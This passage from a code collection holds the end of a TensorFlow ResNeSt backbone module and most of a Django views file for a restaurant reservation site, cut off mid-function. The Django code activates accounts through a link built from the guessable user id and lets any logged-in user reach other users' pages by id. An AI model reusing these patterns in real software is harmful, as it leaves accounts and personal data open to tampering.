self._SplAtConv2d(x, filters=group_width, kernel_size=3, stride=stride, dilation=self.dilation,\n groups=self.cardinality, radix=radix)\n else:\n x = Conv2D(filters, kernel_size=3, strides=stride, padding=\"same\", kernel_initializer=\"he_normal\",\n dilation_rate=self.dilation, use_bias=False, data_format=\"channels_last\")(x)\n\n if avd and not avd_first:\n x = avd_layer(x)\n # print('can')\n\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n x = tf_utils.get_activation(self.activation)(x)\n x = Conv2D(filters, kernel_size=3, strides=1, padding=\"same\", kernel_initializer=\"he_normal\",\n dilation_rate=self.dilation, use_bias=False, data_format=\"channels_last\")(x)\n m2 = Add()([x, short_cut])\n return m2\n\n def _make_layer(self, input_tensor, blocks=4, filters=64, stride=2, is_first=True):\n x = input_tensor\n if self.using_basic_block is True:\n x = self._make_block_basic(x, first_block=True, filters=filters, stride=stride, radix=self.radix,\n avd=self.avd, avd_first=self.avd_first, is_first=is_first)\n # print('0',x.shape)\n\n for i in range(1, blocks):\n x = self._make_block_basic(\n x, first_block=False, filters=filters, stride=1, radix=self.radix, avd=self.avd, avd_first=self.avd_first\n )\n # print(i,x.shape)\n\n elif self.using_basic_block is False:\n x = self._make_block(x, first_block=True, filters=filters, stride=stride, radix=self.radix, avd=self.avd,\n avd_first=self.avd_first, is_first=is_first)\n # print('0',x.shape)\n\n for i in range(1, blocks):\n x = self._make_block(\n x, first_block=False, filters=filters, stride=1, radix=self.radix, avd=self.avd, avd_first=self.avd_first\n )\n # print(i,x.shape)\n return x\n\n def _make_Composite_layer(self,input_tensor,filters=256,kernel_size=1,stride=1,upsample=True):\n x = input_tensor\n x = Conv2D(filters, kernel_size, strides=stride, use_bias=False)(x)\n x = BatchNormalization(axis=self.channel_axis, epsilon=1.001e-5)(x)\n if upsample:\n x = UpSampling2D(size=2)(x)\n return x\n \n def get_config(self):\n return {\n 'model_id': self.model_id,\n 'blocks_set': self.blocks_set,\n 'stem_width': self.stem_width,\n 'deep_stem': self.deep_stem,\n 'activation': self.activation,\n 'dropout_rate': self.dropout_rate,\n \n 'radix': self.radix,\n 'cardinality': self.cardinality,\n 'bottleneck_width': self.bottleneck_width,\n 'block_expansion': self.block_expansion,\n 'avg_down': self.avg_down,\n 'avd': self.avd,\n 'avd_first': self.avd_first,\n\n 'dilation': self.dilation,\n 'preact': self.preact,\n 'using_basic_block': self.using_basic_block,\n 'using_cb': self.using_cb\n }\n \n @classmethod\n def from_config(cls, config, custom_objects=None):\n return cls(**config)\n\n @property\n def output_specs(self):\n \"\"\"A dict of {level: TensorShape} pairs for the model output.\"\"\"\n return self._output_specs\n\n\n@factory.register_backbone_builder('resnest')\ndef build_resnest(\n input_specs: tf.keras.layers.InputSpec,\n backbone_config: hyperparams.Config,\n norm_activation_config: hyperparams.Config,\n l2_regularizer: tf.keras.regularizers.Regularizer = None) -> tf.keras.Model:\n \"\"\"Builds ResNest backbone from a config.\"\"\"\n backbone_type = backbone_config.type\n backbone_cfg = backbone_config.get()\n assert backbone_type == 'resnest', (f'Inconsistent backbone type '\n f'{backbone_type}')\n\n return ResNest(\n model_id=backbone_cfg.model_id,\n input_specs=input_specs,\n stem_type=backbone_cfg.stem_type,\n activation=norm_activation_config.activation)\n # see resnet example to see more configurable options to add\n","sub_path":"official/vision/beta/modeling/backbones/resnest.py","file_name":"resnest.py","file_ext":"py","file_size_in_byte":18679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"535513350","text":"from django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse\n#from django.core.urlresolvers import reverse\n\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth import login as auth_login\nfrom django.contrib.auth import logout as auth_logout\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Guest, Manager, Table, MenuItem, Restaurant, Visit, Reservation, Friendship, ReservedTables\nfrom django.contrib.auth.models import User\nfrom django.core.mail import send_mail\nfrom django.utils import timezone\nfrom datetime import datetime as dt\nimport datetime\nimport pytz\nfrom django.db import transaction\n\nfrom django.conf import settings\nfrom .forms import contactForm\nfrom . import autoreply\n\n# Homepage\ndef index(request):\n return render(request, 'restaurant/index.html')\n#aboutus page\ndef about(request):\n return render(request, 'restaurant/about.html')\n\n# User login\ndef login(request):\n if request.method == 'POST':\n # collecting form data\n username = request.POST.get('username')\n password = request.POST.get('password')\n # checking for user first\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n # check if it is quest or manager\n # search for guest\n guest = Guest.objects.all()\n for g in guest:\n if g.user == user:\n auth_login(request, user)\n return HttpResponseRedirect(reverse('restaurant:guest', args=(g.id,)))\n # search for manager\n managers = Manager.objects.all()\n for m in managers:\n if m.user == user:\n auth_login(request, user)\n return HttpResponseRedirect(reverse('restaurant:manager', args=(m.id,)))\n else:\n return render(request, 'restaurant/index.html', {\n 'error_message': \"Account is not activated!\"\n })\n else:\n return render(request, 'restaurant/index.html', {\n 'error_message': \"Wrong Email address or Password!\"\n })\n\ndef contact(request):\n \"\"\"about page\"\"\"\n title = \"Contact\"\n form = contactForm(request.POST or None) #form handling by view.\n confirmation = None\n\n if form.is_valid():\n user_name = form.cleaned_data['Username']\n user_message = form.cleaned_data['Message']\n emailsub = user_name + \" tried contacting you on Restaurant Table Reservation.\"\n emailFrom = form.cleaned_data['UserEmail']\n emailmessage = '%s %s user email: %s' %(user_message, user_name, emailFrom)\n emailTo = [settings.EMAIL_HOST_USER]\n send_mail(emailsub, emailmessage, emailFrom, list(emailTo), fail_silently=True)\n #Autoreply.\n autoreply.autoreply(emailFrom)\n title = \"Thanks.\"\n confirmation = \"We will get right back to you.\"\n form = None\n\n context = {'title':title, 'form':form, 'confirmation':confirmation,}\n template = 'contact.html'\n return render(request,'restaurant/contact.html',context)\n\n# User logout\ndef logout(request):\n auth_logout(request)\n return HttpResponseRedirect(reverse('restaurant:index'))\n\n\n# User register form\ndef register(request):\n return render(request, 'restaurant/register.html')\n\n\ndef registration(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password1 = request.POST.get('password1')\n password2 = request.POST.get('password2')\n # check password equality\n if password1 == password2:\n users = User.objects.all()\n for u in users:\n if u.username == username:\n return render(request, 'restaurant/register.html', context={\n 'error_message': \"User already exists!\"\n })\n # user does not exist, create new\n new_user = User.objects.create_user(username, username, password1)\n new_user.is_staff = False\n new_user.is_active = False\n new_user.is_superuser = False\n new_user.save()\n # create activation link\n new_user_id = str(new_user.id)\n link = \"http://127.0.0.1:8000/restaurant/activation/\"+new_user_id+\"/\"\n message_text = \"Click on the following link to complete your registration\\n\\n\" + link\n # sending email\n send_mail('Restaurant - Profile Activation', message_text, 'subbusubramani1995@gmail.com', [new_user.username],\n fail_silently=False)\n # creating guest object\n new_guest = Guest.objects.create(user=new_user)\n new_user.save()\n print(\"Successful! Guest inserted: \" + str(new_guest))\n\n # back on page\n return render(request, 'restaurant/register.html', context={\n 'info_message': \"Account created successfully. Email with activation link was sent!\"\n })\n else:\n return render(request, 'restaurant/register.html', context={\n 'error_message': \"Password wasn't repeated correctly!\"\n })\n\n\n# User activation\ndef activation(request, user_id):\n user = get_object_or_404(User, pk=user_id)\n if user is not None:\n user.is_active = True\n user.save()\n return render(request, 'restaurant/index.html', context={\n 'info_message': \"Account successfully activated!\"\n })\n else:\n return render(request, 'restaurant/index.html', context={\n 'error_message': \"Error with activation link!\"\n })\n\n\n\"\"\"Manager pages\"\"\"\n\n# Manager's default page\n@login_required(login_url='/')\ndef manager(request, manager_id):\n this_manager = get_object_or_404(Manager, pk=manager_id)\n restaurant = this_manager.restaurant\n restaurant_tables = Table.objects.filter(restaurant=restaurant)\n rows = range(1, restaurant.rows+1)\n cols = range(1, restaurant.columns+1)\n return render(request, 'restaurant/manager.html', {\n 'manager': this_manager,\n 'restaurant': restaurant,\n 'tables': restaurant_tables,\n 'rows': rows,\n 'columns': cols\n })\n\n\n# Manager's profile page\n@login_required(login_url='/')\ndef profiling(request, manager_id):\n this_manager = get_object_or_404(Manager, pk=manager_id)\n return render(request, 'restaurant/manager_profile.html', {\n 'manager': this_manager\n })\n\n\n# Update Manager's profile\n@login_required(login_url='/')\ndef updating(request, manager_id):\n this_manager = get_object_or_404(Manager, pk=manager_id)\n if request.method == 'POST':\n password1 = request.POST.get('password1')\n password2 = request.POST.get('password2')\n if password1 == password2:\n first_name = request.POST.get('first_name')\n last_name = request.POST.get('last_name')\n updated_manager = Manager.objects.get(pk=manager_id)\n # update profile\n updated_user = updated_manager.user\n updated_user.first_name = first_name\n updated_user.last_name = last_name\n updated_user.save()\n # update password if changed\n if password1 != '':\n updated_user.set_password(password1)\n updated_user.save()\n print(\"Success! Updated Manager: \" + str(updated_manager))\n return HttpResponseRedirect(reverse('restaurant:profiling', args=(manager_id, )))\n else:\n return render(request, 'restaurant/manager_profile.html', context={\n 'manager': this_manager,\n 'error_message': \"New password wasn't repeated correctly!\"\n })\n\n\n# Manager's page for menu setting\n@login_required(login_url='/')\ndef menu(request, restaurant_id, manager_id):\n this_restaurant = get_object_or_404(Restaurant, pk=restaurant_id)\n menu_items = MenuItem.objects.filter(restaurant=this_restaurant)\n this_manager = Manager.objects.get(pk=manager_id)\n return render(request, 'restaurant/menu.html', {\n 'manager': this_manager,\n 'restaurant': this_restaurant,\n 'menu': menu_items\n })\n\n\n# Deleting menu item from restaurant\n@login_required(login_url='/')\ndef remove(request, item_id, restaurant_id, manager_id):\n item = get_object_or_404(MenuItem, pk=item_id)\n item.delete()\n return HttpResponseRedirect(reverse('restaurant:menu', args=(restaurant_id, manager_id,)))\n\n\n# Insert menu item for restaurant\n@login_required(login_url='/')\ndef insert(request, restaurant_id, manager_id):\n if request.method == 'POST':\n name = request.POST.get('name')\n description = request.POST.get('description')\n price = float(request.POST.get('price'))\n this_restaurant = Restaurant.objects.get(pk=restaurant_id)\n\n mi = MenuItem.objects.create(name=name, description=description, price=price, restaurant=this_restaurant)\n mi.save()\n print(\"Success. Inserted MenuItem: \" + str(mi))\n\n return HttpResponseRedirect(reverse('restaurant:menu', args=(restaurant_id, manager_id,)))\n\n\n# show edit menu item for restaurant\n@login_required(login_url='/')\ndef edit(request, item_id, restaurant_id, manager_id):\n this_item = get_object_or_404(MenuItem, pk=item_id)\n this_restaurant = get_object_or_404(Restaurant, pk=restaurant_id)\n this_manager = get_object_or_404(Manager, pk=manager_id)\n menu_items = MenuItem.objects.filter(restaurant=this_restaurant)\n return render(request, 'restaurant/menuedit.html', context={\n 'manager': this_manager,\n 'restaurant': this_restaurant,\n 'menu': menu_items,\n 'edition': this_item\n })\n\n# save edited data\n@login_required(login_url='')\ndef saveedition(request, item_id, restaurant_id, manager_id):\n this_restaurant = get_object_or_404(Restaurant, pk=restaurant_id)\n this_manager = get_object_or_404(Manager, pk=manager_id)\n this_item = get_object_or_404(MenuItem, pk=item_id)\n if request.method == 'POST':\n name = request.POST.get('name')\n description = request.POST.get('description')\n price = float(request.POST.get('price'))\n edit_item = MenuItem.objects.get(pk=item_id)\n edit_item.name = name\n edit_item.description = description\n edit_item.price = price\n edit_item.save()\n print(\"Success! Edited MenuItem: \" + str(edit_item))\n return HttpResponseRedirect(reverse('restaurant:menu', args=(restaurant_id, manager_id, )))\n\n\n# class for sitting schedule setting\nclass Place:\n def __init__(self, row, column, name):\n self.row = row\n self.column = column\n self.name = name\n\n\n# Setting sitting schedule\n@login_required(login_url='/')\ndef tables(request, restaurant_id, manager_id):\n this_restaurant = get_object_or_404(Restaurant, pk=restaurant_id)\n if this_restaurant.is_ready:\n return HttpResponseRedirect(reverse('restaurant:manager', args=(manager_id,)))\n else:\n rows = range(1, this_restaurant.rows+1)\n cols = range(1, this_restaurant.columns+1)\n places = []\n for i in rows:\n for j in cols:\n name = (i-1)*this_restaurant.columns + j\n places.append(Place(i, j, name))\n max_tables = this_restaurant.tables\n this_manager = Manager.objects.get(pk=manager_id)\n return render(request, 'restaurant/tables.html', {\n 'manager': this_manager,\n 'restaurant': this_restaurant,\n 'rows': rows,\n 'columns': cols,\n 'tables': max_tables,\n 'places': places\n })\n\n\n# Setup table schedule\n@login_required(login_url='/')\ndef setup(request, restaurant_id, manager_id):\n # prepare data for going back\n this_restaurant = get_object_or_404(Restaurant, pk=restaurant_id)\n this_manager = get_object_or_404(Manager, pk=manager_id)\n r_rows = range(1, this_restaurant.rows+1)\n r_cols = range(1, this_restaurant.columns+1)\n r_places = []\n for i in r_rows:\n for j in r_cols:\n r_name = (i-1)*this_restaurant.columns + j\n r_places.append(Place(i, j, r_name))\n\n if this_restaurant.is_ready:\n return HttpResponseRedirect(reverse('restaurant:manager', args=(manager_id,)))\n else:\n rows = range(1, this_restaurant.rows+1)\n cols = range(1, this_restaurant.columns+1)\n places = range(1, this_restaurant.tables+1)\n tables_order = []\n tables_numbers = []\n if request.method == 'POST':\n for p in r_places:\n table_name = request.POST.get(str(p.name))\n # if inserted\n if table_name != '':\n table_num = int(table_name)\n # check for repeat\n if table_num in tables_numbers:\n message = \"Please set \" + str(this_restaurant.tables) + \" different tables!\"\n return render(request, 'restaurant/tables.html', {\n 'manager': this_manager,\n 'restaurant': this_restaurant,\n 'rows': r_rows,\n 'columns': r_cols,\n 'tables': this_restaurant.tables,\n 'places': r_places,\n 'error_message': message\n })\n else:\n r = p.row\n c = p.column\n tables_order.append(Place(r, c, table_num))\n tables_numbers.append(table_num)\n # check for number of tables\n if len(tables_order) == this_restaurant.tables:\n # before inserting tables, see for duplicates\n\n # inserting tables\n for t in range(0, len(tables_order)):\n r = tables_order[t].row\n c = tables_order[t].column\n n = tables_order[t].name\n # inserting table\n new_table = Table.objects.create(number=n, row=r, column=c, currently_free=True,\n restaurant=this_restaurant)\n new_table.save()\n print(\"Success. Inserted Table: \" + str(new_table))\n # restaurant is now ready\n update_restaurant = Restaurant.objects.get(pk=restaurant_id)\n update_restaurant.is_ready = True\n update_restaurant.save()\n print(\"Success. Updated Restaurant: \" + str(update_restaurant))\n return HttpResponseRedirect(reverse('restaurant:manager', args=(manager_id,)))\n else:\n message = \"Please set \" + str(this_restaurant.tables) + \" tables!\"\n return render(request, 'restaurant/tables.html', {\n 'manager': this_manager,\n 'restaurant': this_restaurant,\n 'rows': r_rows,\n 'columns': r_cols,\n 'tables': this_restaurant.tables,\n 'places': r_places,\n 'error_message': message\n })\n\n\n\"\"\"User pages\"\"\"\n\n# Guest's default page\n@login_required(login_url='/')\ndef guest(request, guest_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n right_now = timezone.now()\n visits = Visit.objects.filter(guest=this_guest).filter(confirmed=True).filter(ending_time__lte=right_now)\n return render(request, 'restaurant/guest.html', context={\n 'guest': this_guest,\n 'visits': visits\n })\n\n\n# Rating visit view\n@login_required(login_url='/')\ndef rate(request, guest_id, visit_id):\n this_visit = get_object_or_404(Visit, pk=visit_id)\n this_guest = get_object_or_404(Guest, pk=guest_id)\n this_reservation = this_visit.reservation\n # searching for friends visits\n friends_visits = Visit.objects.filter(reservation=this_reservation).filter(confirmed=True).exclude(guest=this_guest)\n count = len(friends_visits)\n # show page\n return render(request, 'restaurant/rating.html', context={\n 'guest': this_guest,\n 'visit': this_visit,\n 'friends': friends_visits,\n 'count': count\n })\n\n# Process rate\n@login_required(login_url='/')\ndef rating(request, guest_id, visit_id):\n if request.method == 'POST':\n this_rating = int(request.POST.get('rating'))\n this_visit = Visit.objects.get(pk=visit_id)\n this_visit.grade = this_rating\n this_visit.save()\n print(\"Success! Rated: \" + str(this_visit))\n return HttpResponseRedirect(reverse('restaurant:guest', args=(guest_id, )))\n\n\n# User friends\n@login_required(login_url='/')\ndef friends(request, guest_id):\n # search for friendships where guest is user\n this_guest = get_object_or_404(Guest, pk=guest_id)\n # get number of friends\n friends_list = get_friends_list(this_guest)\n # calculate number of visits for every friend\n number_of_visits = []\n right_now = timezone.now()\n for ff in friends_list:\n number = len(Visit.objects.filter(guest=ff).filter(confirmed=True).filter(ending_time__lte=right_now))\n number_of_visits.append(number)\n friends_send = zip(friends_list, number_of_visits)\n return render(request, 'restaurant/friends.html', context={\n 'guest': this_guest,\n 'friends': friends_send\n })\n\n\n# Search for friends\n@login_required(login_url='/')\ndef search(request, guest_id):\n # find user\n this_guest = get_object_or_404(Guest, pk=guest_id)\n # select other users\n all_guests = Guest.objects.all().exclude(pk=guest_id)\n # find list of friends\n friends_list = get_friends_list(this_guest)\n # users for rendering\n if request.method == 'POST':\n query = request.POST.get('name').lower()\n render_users = []\n for g in all_guests:\n if g not in friends_list:\n # search for name and surname\n if (query in g.user.first_name.lower()) or (query in g.user.last_name.lower()):\n render_users.append(g)\n # prepare data for resend\n number_of_visits = []\n right_now = timezone.now()\n for ff in friends_list:\n number = len(Visit.objects.filter(guest=ff).filter(confirmed=True).filter(ending_time__lte=right_now))\n number_of_visits.append(number)\n friends_send = zip(friends_list, number_of_visits)\n if len(render_users) == 0:\n return render(request, 'restaurant/friends.html', context={\n 'guest': this_guest,\n 'friends': friends_send,\n 'error_message': \"No Users with given First Name and/or Last Name!\"\n })\n else:\n return render(request, 'restaurant/friends.html', context={\n 'guest': this_guest,\n 'friends': friends_send,\n 'connections': render_users\n })\n\n\n# Make new friendship\n@login_required(login_url='/')\ndef connect(request, guest_id, connection_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n new_friend = get_object_or_404(Guest, pk=connection_id)\n new_friendship = Friendship.objects.create(user=this_guest, friend=new_friend)\n new_friendship.save()\n print(\"Success! New Friendship: \" + str(new_friendship))\n return HttpResponseRedirect(reverse('restaurant:friends', args=(guest_id, )))\n\n\n# Remove friend\n@login_required(login_url='/')\ndef disconnect(request, guest_id, friend_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n this_friend = get_object_or_404(Guest, pk=friend_id)\n # first search friendships where guest is user\n user_friendship = Friendship.objects.filter(user=this_guest)\n for f in user_friendship:\n if f.friend == this_friend:\n f.delete()\n print(\"Success! Friendship deleted!\")\n return HttpResponseRedirect(reverse('restaurant:friends', args=(guest_id, )))\n # now search friendships where guest is friend\n friend_friendship = Friendship.objects.filter(friend=this_guest)\n for f in friend_friendship:\n if f.user == this_friend:\n f.delete()\n print(\"Success! Friendship deleted!\")\n return HttpResponseRedirect(reverse('restaurant:friends', args=(guest_id, )))\n\n# User profile\n@login_required(login_url='/')\ndef profile(request, guest_id):\n # search for guest\n this_guest = get_object_or_404(Guest, pk=guest_id)\n # get friends\n friends_list = get_friends_list(this_guest)\n # show\n return render(request, 'restaurant/profile.html', context={\n 'guest': this_guest,\n 'friends': friends_list\n })\n\n# Update User profile info\n@login_required(login_url='/')\ndef update(request, guest_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n if request.method == 'POST':\n password1 = request.POST.get('password1')\n password2 = request.POST.get('password2')\n if password1 == password2:\n first_name = request.POST.get('first_name')\n last_name = request.POST.get('last_name')\n address = request.POST.get('address')\n updated_guest = Guest.objects.get(pk=guest_id)\n updated_guest.address = address\n updated_guest.save()\n print(\"Success! Updated Guest: \" + str(updated_guest))\n # update profile\n updated_user = updated_guest.user\n updated_user.first_name = first_name\n updated_user.last_name = last_name\n updated_user.save()\n # update password if changed\n if password1 != '':\n updated_user.set_password(password1)\n updated_user.save()\n print(\"Success! Updated User: \" + str(updated_user))\n return HttpResponseRedirect(reverse('restaurant:profile', args=(guest_id, )))\n else:\n friends_list = get_friends_list(this_guest)\n return render(request, 'restaurant/profile.html', context={\n 'guest': this_guest,\n 'friends': friends_list,\n 'error_message': \"New password wasn't repeated correctly!\"\n })\n\n\n# Searching for friends on profile page\n@login_required(login_url='/')\ndef searching(request, guest_id):\n # find user\n this_guest = get_object_or_404(Guest, pk=guest_id)\n # select other users\n all_guests = Guest.objects.all().exclude(pk=guest_id)\n # find list of friends\n friends_list = get_friends_list(this_guest)\n # users for rendering\n if request.method == 'POST':\n query = request.POST.get('name').lower()\n render_users = []\n for g in all_guests:\n if g not in friends_list:\n # search for name and surname\n if query in g.user.first_name.lower() or query in g.user.last_name.lower():\n render_users.append(g)\n # prepare data for resend\n if len(render_users) == 0:\n return render(request, 'restaurant/profile.html', context={\n 'guest': this_guest,\n 'friends': friends_list,\n 'search_error': \"No Users with given First Name and/or Last Name!\"\n })\n else:\n return render(request, 'restaurant/profile.html', context={\n 'guest': this_guest,\n 'friends': friends_list,\n 'connections': render_users\n })\n\n\n# get list of friends for given guest\ndef get_friends_list(this_guest):\n friendship_user = Friendship.objects.filter(user=this_guest)\n friendship_friend = Friendship.objects.filter(friend=this_guest)\n friends_list = []\n # selecting friends - friend\n for f in friendship_user:\n friend = f.friend\n if friend not in friends_list:\n friends_list.append(friend)\n # selecting friends - user\n for f in friendship_friend:\n friend = f.user\n if friend not in friends_list:\n friends_list.append(friend)\n return friends_list\n\n\n# Display restaurant list with ratings\n@login_required(login_url='/')\ndef restaurantlist(request, guest_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n restaurants = Restaurant.objects.filter(is_ready=True)\n restaurant_rate = []\n restaurant_friend_rate = []\n for r in restaurants:\n restaurant_rate.append(get_restaurant_rating(r))\n restaurant_friend_rate.append(get_restaurants_friends_rating(r, this_guest))\n restaurants_send = zip(restaurants, restaurant_rate, restaurant_friend_rate)\n return render(request, 'restaurant/restaurants_list.html', context={\n 'guest': this_guest,\n 'restaurants': restaurants_send\n })\n\n\n# calculates restaurant's rating\ndef get_restaurant_rating(this_restaurant):\n list_of_visits = Visit.objects.filter(confirmed=True)\n s = 0\n c = 0\n for v in list_of_visits:\n if v.reservation.restaurant == this_restaurant:\n if v.grade is not None and v.grade >= 1:\n s += v.grade\n c += 1\n if c == 0:\n return 0\n else:\n r = s/c\n return round(r, 2)\n\n\n# calculates restaurant's friends rating\ndef get_restaurants_friends_rating(this_restaurant, this_guest):\n guest_friends = get_friends_list(this_guest)\n all_visits = Visit.objects.filter(confirmed=True)\n list_of_visits = []\n for v in all_visits:\n if v.guest in guest_friends or v.guest == this_guest:\n list_of_visits.append(v)\n s = 0\n c = 0\n for v in list_of_visits:\n if v.reservation.restaurant == this_restaurant:\n if v.grade is not None and v.grade >= 1:\n s += v.grade\n c += 1\n if c == 0:\n return 0\n else:\n r = s/c\n return round(r, 2)\n\n\n# shows restaurant's profile with menu\n@login_required(login_url='/')\ndef restaurantmenu(request, guest_id, restaurant_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n this_restaurant = get_object_or_404(Restaurant, pk=restaurant_id)\n menu_items = MenuItem.objects.filter(restaurant=this_restaurant)\n return render(request, 'restaurant/restaurant_menu.html', context={\n 'restaurant': this_restaurant,\n 'guest': this_guest,\n 'items': menu_items\n })\n\n\n# shows history of guest's reservations\n@login_required(login_url='/')\ndef myreservations(request, guest_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n this_reservations = Reservation.objects.filter(guest=this_guest)\n return render(request, 'restaurant/my_reservations.html', context={\n 'guest': this_guest,\n 'reservations': this_reservations\n })\n\n\n# reservation time\n@login_required(login_url='/')\ndef reservationtime(request, guest_id, restaurant_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n this_restaurant = get_object_or_404(Restaurant, pk=restaurant_id)\n return render(request, 'restaurant/reservation_time.html', context={\n 'guest': this_guest,\n 'restaurant': this_restaurant\n })\n\n\n# setup reservation\n@login_required(login_url='/')\ndef makereservation(request, guest_id, restaurant_id):\n # find guest and restaurant\n this_guest = get_object_or_404(Guest, pk=guest_id)\n this_restaurant = get_object_or_404(Restaurant, pk=restaurant_id)\n # find all reservations for given restaurant\n all_reservations = Reservation.objects.filter(restaurant=this_restaurant)\n # process form\n if request.method == 'POST':\n # get date from form\n date_time = request.POST.get('datetime')\n if date_time == '':\n return render(request, 'restaurant/reservation_time.html', context={\n 'guest': this_guest,\n 'restaurant': this_restaurant,\n 'error_message': \"Please insert Date and Time\"\n })\n coming = dt.strptime(date_time, '%d-%b-%Y %H:%M:%S')\n # localize to my timezone\n coming_time = pytz.utc.localize(coming)\n # time for comparison\n right_now = timezone.now()\n if coming_time < right_now:\n return render(request, 'restaurant/reservation_time.html', context={\n 'guest': this_guest,\n 'restaurant': this_restaurant,\n 'error_message': \"It's impossible to reserve in the past!\"\n })\n else:\n # get duration time\n duration = int(request.POST.get('duration'))\n # calculate ending time\n ending_time = coming_time + datetime.timedelta(hours=duration)\n # filter reservations with same time like new reservation\n taken_tables = 0\n for r in all_reservations:\n if are_overlap(coming_time, ending_time, r):\n taken_tables += get_tables_from_reservation(r)\n if taken_tables == this_restaurant.tables:\n return render(request, 'restaurant/reservation_time.html', context={\n 'guest': this_guest,\n 'restaurant': this_restaurant,\n 'error_message': \"No available tables for given reservation period!\"\n })\n else:\n # get all restaurant tables\n all_restaurant_tables = Table.objects.filter(restaurant=this_restaurant)\n # get reserved tables\n all_reserved_tables = []\n for r in all_reservations:\n if are_overlap(coming_time, ending_time, r):\n rt = reserved_tables_from_reservation(r)\n if rt is not None:\n for rrtt in rt:\n all_reserved_tables.append(rrtt)\n # check if table is reserved or not\n for single_table in all_restaurant_tables:\n if single_table in all_reserved_tables:\n single_table.currently_free = False\n single_table.save()\n else:\n single_table.currently_free = True\n single_table.save()\n # tables are ready\n rows = range(1, this_restaurant.rows+1)\n columns = range(1, this_restaurant.columns+1)\n # create new reservation object\n new_reservation = Reservation.objects.create(coming=coming_time, duration=duration, guest=this_guest,\n restaurant=this_restaurant)\n new_reservation.save()\n print(\"Success! Created Reservation: \" + str(new_reservation))\n created_reservation = Reservation.objects.get(pk=new_reservation.id)\n render_tables = Table.objects.filter(restaurant=this_restaurant)\n return render(request, 'restaurant/reservation_tables.html', context={\n 'guest': this_guest,\n 'restaurant': this_restaurant,\n 'reservation': created_reservation,\n 'tables': render_tables,\n 'rows': rows,\n 'columns': columns\n })\n\n\n# check if two reservation periods overlap\ndef are_overlap(coming_time, ending_time, this_reservation):\n reservation_start = this_reservation.coming\n reservation_end = this_reservation.get_finishing_time()\n if coming_time <= reservation_start <= ending_time:\n return True\n else:\n if coming_time <= reservation_end <= ending_time:\n return True\n else:\n if reservation_start <= coming_time <= reservation_end:\n return True\n else:\n if reservation_start <= ending_time <= reservation_end:\n return True\n else:\n return False\n\n\n# get number of tables from reservation\ndef get_tables_from_reservation(this_reservation):\n reserved_tables = ReservedTables.objects.filter(reservation=this_reservation)\n if reserved_tables is not None:\n return len(reserved_tables)\n else:\n return 0\n\n\n# get table object from reservation\ndef reserved_tables_from_reservation(this_reservation):\n rt = ReservedTables.objects.filter(reservation=this_reservation)\n if rt is not None:\n ret_val = []\n for r in rt:\n ret_val.append(r.table)\n return ret_val\n else:\n return None\n\n\n# reserving tables\n@login_required(login_url='/')\n@transaction.atomic\ndef reservetables(request, guest_id, restaurant_id, reservation_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n this_restaurant = get_object_or_404(Restaurant, pk=restaurant_id)\n this_reservation = get_object_or_404(Reservation, pk=reservation_id)\n this_tables = Table.objects.filter(restaurant=this_restaurant)\n selected_tables = []\n if request.method == 'POST':\n for t in this_tables:\n if request.POST.get(str(t.id)):\n selected_tables.append(t)\n if len(selected_tables) == 0:\n delete_reservation = Reservation.objects.get(pk=reservation_id)\n delete_reservation.delete()\n print(\"Deleted Reservation!!!\")\n return render(request, 'restaurant/reservation_time.html', context={\n 'guest': this_guest,\n 'restaurant': this_restaurant,\n 'error_message': \"Unsuccessful Reservation! Tables weren't selected!\"\n })\n # try to reserve tables\n try:\n with transaction.atomic():\n for t in selected_tables:\n reserve_new_table = ReservedTables.objects.create(reservation=this_reservation, table=t)\n reserve_new_table.save()\n print(\"Success! Reserved table: \" + str(t))\n # someonte reserve the table meanwhile\n except:\n delete_reservation = Reservation.objects.get(pk=reservation_id)\n delete_reservation.delete()\n print(\"Deleted Reservation!!!\")\n return render(request, 'restaurant/reservation_time.html', context={\n 'guest': this_guest,\n 'restaurant': this_restaurant,\n 'error_message': \"Unsuccessful Reservation! Selected tables are already reserved!\"\n })\n\n # if everything was fine create new visit object\n stops = this_reservation.get_finishing_time()\n new_visit = Visit.objects.create(ending_time=stops, confirmed=True, reservation=this_reservation, guest=this_guest)\n new_visit.save()\n print(\"Success! Created new visit: \" + str(new_visit))\n list_of_friends = get_friends_list(this_guest)\n return render(request, 'restaurant/reservation_friends.html', context={\n 'guest': this_guest,\n 'restaurant': this_restaurant,\n 'reservation': this_reservation,\n 'friends': list_of_friends\n })\n\n\n\n@login_required(login_url='')\ndef invitefriends(request, guest_id, restaurant_id, reservation_id):\n this_guest = get_object_or_404(Guest, pk=guest_id)\n this_restaurant = get_object_or_404(Restaurant, pk=restaurant_id)\n this_reservation = get_object_or_404(Reservation, pk=reservation_id)\n # get friends list\n friend_list = get_friends_list(this_guest)\n selected_friends = []\n if request.method == 'POST':\n # collect friends\n for f in friend_list:\n if request.POST.get(str(f.id)):\n selected_friends.append(f)\n # if there is no selected friends, send to my reservations\n if len(selected_friends) == 0:\n return HttpResponseRedirect(reverse('restaurant:myreservations', args=(guest_id, )))\n else:\n # send mail invitations and create visit objects\n stops = this_reservation.get_finishing_time()\n for this_friend in selected_friends:\n print(\"Working for: \" + str(this_friend))\n friend_guest = get_object_or_404(Guest, pk=this_friend.id)\n new_visit = Visit.objects.create(ending_time=stops, confirmed=False, reservation=this_reservation,\n guest=friend_guest)\n new_visit.save()\n print(\"Success! Created new visit: \" + str(new_visit))\n # send_mail\n message_text = \"You got an invitation to visit Restaurant. Login and follow link to see more:\\n\\n\"\n link_text = \"http://127.0.0.1:8000/restaurant/showinvitation/\"+str(friend_guest.id)+\"/\"+reservation_id+\"/\"+str(new_visit.id)+\"/\"\n text_to_send = message_text + link_text\n 